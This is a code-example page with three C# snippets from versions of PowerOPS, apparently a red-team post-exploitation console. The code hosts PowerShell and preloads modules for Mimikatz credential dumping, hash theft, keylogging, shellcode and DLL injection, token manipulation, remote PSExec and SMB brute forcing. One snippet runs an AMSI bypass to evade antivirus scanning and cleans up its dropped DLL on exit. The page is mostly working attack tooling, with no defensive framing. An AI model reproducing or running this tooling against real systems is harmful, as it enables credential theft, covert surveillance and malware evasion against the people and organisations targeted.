コード例 #1
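        /// <summary>
        /// Runs <paramref name="PSfunction"/> in a fresh, single-use runspace and writes the
        /// pipeline's <c>Out-String</c> output to the console.
        /// </summary>
        /// <param name="PSfunction">
        /// PowerShell script text. It is added to the pipeline as-is after the bundled module
        /// scripts, so whatever the caller passes in is executed unchanged.
        /// </param>
        /// <remarks>
        /// Both the runspace and the pipeline are <c>IDisposable</c>; they are wrapped in
        /// <c>using</c> so an exception thrown by <c>Invoke()</c> no longer leaves an opened
        /// runspace behind (the previous version only reached <c>runspace.Close()</c> on the
        /// success path).
        /// </remarks>
        public void ExecuteSynchronously(string PSfunction)
        {
            // One runspace per call; nothing is shared between invocations.
            using (Runspace runspace = RunspaceFactory.CreateRunspace())
            {
                runspace.Open();

                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    // Module scripts go in first so the functions they define are loaded
                    // before the caller's script runs. Order is kept as in the original.
                    pipeline.Commands.AddScript(PowerOPS.PowerView());
                    pipeline.Commands.AddScript(PowerOPS.PowerUp());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
                    pipeline.Commands.AddScript(PowerOPS.AutoGPP());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
                    pipeline.Commands.AddScript(PowerOPS.Mimikatz());
                    pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
                    pipeline.Commands.AddScript(PowerOPS.InvokePEInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
                    pipeline.Commands.AddScript(PowerOPS.TokenManipulation());
                    pipeline.Commands.AddScript(PowerOPS.InvokeWMI());
                    pipeline.Commands.AddScript(PowerOPS.InvokePSExec());
                    pipeline.Commands.AddScript(PowerOPS.PowerCat());
                    pipeline.Commands.AddScript(PSfunction);
                    // Out-String flattens everything to text for the console.
                    pipeline.Commands.Add("Out-String");

                    Collection<PSObject> results = pipeline.Invoke();

                    StringBuilder output = new StringBuilder();
                    foreach (PSObject item in results)
                    {
                        output.AppendLine(item.ToString());
                    }

                    Console.Write(output.ToString());
                }

                // Explicit Close keeps the original's ordering; Dispose follows at the end of the using.
                runspace.Close();
            }
        }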
コード例 #2
ファイル: Program.cs プロジェクト: wflk/PowerOPS
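        /// <summary>
        /// Interactive loop: reads one line at a time from the console and runs it in a single
        /// long-lived runspace, with the bundled module scripts added to every pipeline ahead
        /// of the typed command.
        /// </summary>
        /// <remarks>
        /// An end-of-input <c>null</c> from <see cref="Console.ReadLine"/> is treated like
        /// <c>exit</c> instead of being dereferenced in the <c>default</c> branch, and the
        /// runspace is disposed on every exit path; previously <c>return</c> inside the
        /// switch skipped <c>runspace.Close()</c>.
        /// </remarks>
        public static void Main()
        {
            Console.Title = "PowerOPS - [email protected]";
            Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight));
            Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight);

            DisplayBanner();
            Console.WriteLine("Type 'show' to list available modules\n");

            using (Runspace runspace = RunspaceFactory.CreateRunspace())
            {
                runspace.Open();

                bool running = true;
                while (running)
                {
                    Console.Write("PS > ");
                    string command = Console.ReadLine();

                    switch (command)
                    {
                    case "show":
                        DisplayModules();
                        break;

                    // null means stdin was closed; leave the loop the same way "exit" does.
                    case null:
                    case "exit":
                        running = false;
                        break;

                    default:
                        if (CanRun(command))
                        {
                            RunCommand(runspace, command);
                        }
                        break;
                    }
                }

                runspace.Close();
            }

            Environment.Exit(0);
        }

        /// <summary>
        /// Pre-flight gate for a typed command. Commands starting with
        /// <c>Invoke-Mimikatz</c> or <c>Get-PassHashes</c> require <c>IsUserAdministrator()</c>
        /// to be true; <c>Invoke-Shellcode</c> requires <c>isArch_x86()</c> to be true. Both
        /// helpers are defined elsewhere in the project. A command that fails its gate is
        /// skipped silently, as in the original loop.
        /// </summary>
        /// <param name="command">Non-null line typed at the prompt.</param>
        /// <returns><c>true</c> when the command may be sent to the runspace.</returns>
        private static bool CanRun(string command)
        {
            if (command.StartsWith("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase)
                || command.StartsWith("Get-PassHashes", StringComparison.OrdinalIgnoreCase))
            {
                return IsUserAdministrator();
            }

            if (command.StartsWith("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase))
            {
                return isArch_x86();
            }

            return true;
        }

        /// <summary>
        /// Runs one typed command in <paramref name="runspace"/>, loading the bundled module
        /// scripts into the pipeline first, and writes the <c>Out-String</c> result to the
        /// console. A pipeline exception is reported by message and does not end the session.
        /// </summary>
        /// <param name="runspace">Opened runspace shared across the whole session.</param>
        /// <param name="command">Script text to add after the module scripts.</param>
        private static void RunCommand(Runspace runspace, string command)
        {
            try
            {
                // Pipeline is IDisposable; dispose it per command rather than leaking one per line.
                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes());
                    pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz());
                    pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
                    pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
                    pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation());
                    pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand());
                    pipeline.Commands.AddScript(PowerOPS.PowerUp());
                    pipeline.Commands.AddScript(PowerOPS.PowerView());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
                    pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword());
                    pipeline.Commands.AddScript(PowerOPS.PowerCat());
                    pipeline.Commands.AddScript(PowerOPS.GetProductKey());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand());
                    pipeline.Commands.AddScript(command);
                    pipeline.Commands.Add("Out-String");

                    Collection<PSObject> results = pipeline.Invoke();

                    StringBuilder output = new StringBuilder();
                    foreach (PSObject item in results)
                    {
                        output.AppendLine(item.ToString());
                    }
                    Console.Write(output.ToString());
                }
            }
            catch (Exception e)
            {
                // Same best-effort reporting as before: show the message, keep the prompt alive.
                Console.WriteLine("{0}", e.Message);
            }
        }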
コード例 #3
ファイル: Program.cs プロジェクト: ols3er/PowerOPS
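        /// <summary>
        /// Interactive loop: reads one line at a time from the console and runs it in a single
        /// long-lived runspace, with the bundled module scripts added to every pipeline ahead
        /// of the typed command.
        /// </summary>
        /// <remarks>
        /// An end-of-input <c>null</c> from <see cref="Console.ReadLine"/> is treated like
        /// <c>exit</c> instead of being dereferenced in the <c>default</c> branch, so the
        /// exit-time cleanup (the <c>Amsi.dll</c> removal and the runspace shutdown) runs on
        /// that path too rather than only when the user types <c>exit</c>.
        /// </remarks>
        public static void Main()
        {
            Console.Title = "PowerOPS - [email protected]";
            Console.SetWindowSize(Math.Min(122, Console.LargestWindowWidth), Math.Min(40, Console.LargestWindowHeight));
            Console.SetBufferSize(Console.BufferWidth, Console.BufferHeight);

            // Amsi bypass technique from: http://cn33liz.blogspot.co.uk/2016/05/bypassing-amsi-using-powershell-5-dll.html
            string arch = System.Environment.GetEnvironmentVariable("PROCESSOR_ARCHITECTURE");

            amsibypass.Amsi(arch);

            DisplayBanner();
            Console.WriteLine("Type 'show' to list available modules\n");

            using (Runspace runspace = RunspaceFactory.CreateRunspace())
            {
                runspace.Open();

                bool running = true;
                while (running)
                {
                    Console.Write("PS > ");
                    string command = Console.ReadLine();

                    switch (command)
                    {
                    case "show":
                        DisplayModules();
                        break;

                    // null means stdin was closed; leave the loop the same way "exit" does.
                    case null:
                    case "exit":
                        running = false;
                        break;

                    default:
                        if (CanRun(command))
                        {
                            RunCommand(runspace, command);
                        }
                        break;
                    }
                }

                // The Amsi.dll in the working directory is presumably written by amsibypass.Amsi
                // (not visible here); it was removed on "exit" before, and still is.
                string amsiDllPath = Path.Combine(Directory.GetCurrentDirectory(), "Amsi.dll");
                if (File.Exists(amsiDllPath))
                {
                    File.Delete(amsiDllPath);
                }

                runspace.Close();
            }

            Environment.Exit(0);
        }

        /// <summary>
        /// Pre-flight gate for a typed command. Commands starting with
        /// <c>Invoke-Mimikatz</c> or <c>Get-PassHashes</c> require <c>IsUserAdministrator()</c>
        /// to be true; <c>Invoke-Shellcode</c> requires <c>isArch_x86()</c> to be true. Both
        /// helpers are defined elsewhere in the project. A command that fails its gate is
        /// skipped silently, as in the original loop.
        /// </summary>
        /// <param name="command">Non-null line typed at the prompt.</param>
        /// <returns><c>true</c> when the command may be sent to the runspace.</returns>
        private static bool CanRun(string command)
        {
            if (command.StartsWith("Invoke-Mimikatz", StringComparison.OrdinalIgnoreCase)
                || command.StartsWith("Get-PassHashes", StringComparison.OrdinalIgnoreCase))
            {
                return IsUserAdministrator();
            }

            if (command.StartsWith("Invoke-Shellcode", StringComparison.OrdinalIgnoreCase))
            {
                return isArch_x86();
            }

            return true;
        }

        /// <summary>
        /// Runs one typed command in <paramref name="runspace"/>, loading the bundled module
        /// scripts into the pipeline first, and writes the <c>Out-String</c> result to the
        /// console. A pipeline exception is reported by message and does not end the session.
        /// </summary>
        /// <param name="runspace">Opened runspace shared across the whole session.</param>
        /// <param name="command">Script text to add after the module scripts.</param>
        private static void RunCommand(Runspace runspace, string command)
        {
            try
            {
                // Pipeline is IDisposable; dispose it per command rather than leaking one per line.
                using (Pipeline pipeline = runspace.CreatePipeline())
                {
                    pipeline.Commands.AddScript(PowerOPS.GetKeyStrokes());
                    pipeline.Commands.AddScript(PowerOPS.InvokeDLLInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeMimikatz());
                    pipeline.Commands.AddScript(PowerOPS.InvokeNinjaCopy());
                    pipeline.Commands.AddScript(PowerOPS.InvokeReflectivePEInjection());
                    pipeline.Commands.AddScript(PowerOPS.InvokeShellcode());
                    pipeline.Commands.AddScript(PowerOPS.InvokeTokenManipulation());
                    pipeline.Commands.AddScript(PowerOPS.InvokeWMICommand());
                    pipeline.Commands.AddScript(PowerOPS.PowerUp());
                    pipeline.Commands.AddScript(PowerOPS.PowerView());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetInformation());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_GetPassHashes());
                    pipeline.Commands.AddScript(PowerOPS.Nishang_PortScan());
                    pipeline.Commands.AddScript(PowerOPS.AutoGPPPassword());
                    pipeline.Commands.AddScript(PowerOPS.PowerCat());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokePSExec());
                    pipeline.Commands.AddScript(PowerOPS.Empire_InvokeSshCommand());
                    pipeline.Commands.AddScript(PowerOPS.InvokeMimikittenz());
                    pipeline.Commands.AddScript(PowerOPS.PowerUpSQL());
                    pipeline.Commands.AddScript(PowerOPS.InvokeSMBAutoBrute());
                    pipeline.Commands.AddScript(command);
                    pipeline.Commands.Add("Out-String");

                    Collection<PSObject> results = pipeline.Invoke();

                    StringBuilder output = new StringBuilder();
                    foreach (PSObject item in results)
                    {
                        output.AppendLine(item.ToString());
                    }
                    Console.Write(output.ToString());
                }
            }
            catch (Exception e)
            {
                // Same best-effort reporting as before: show the message, keep the prompt alive.
                Console.WriteLine("{0}", e.Message);
            }
        }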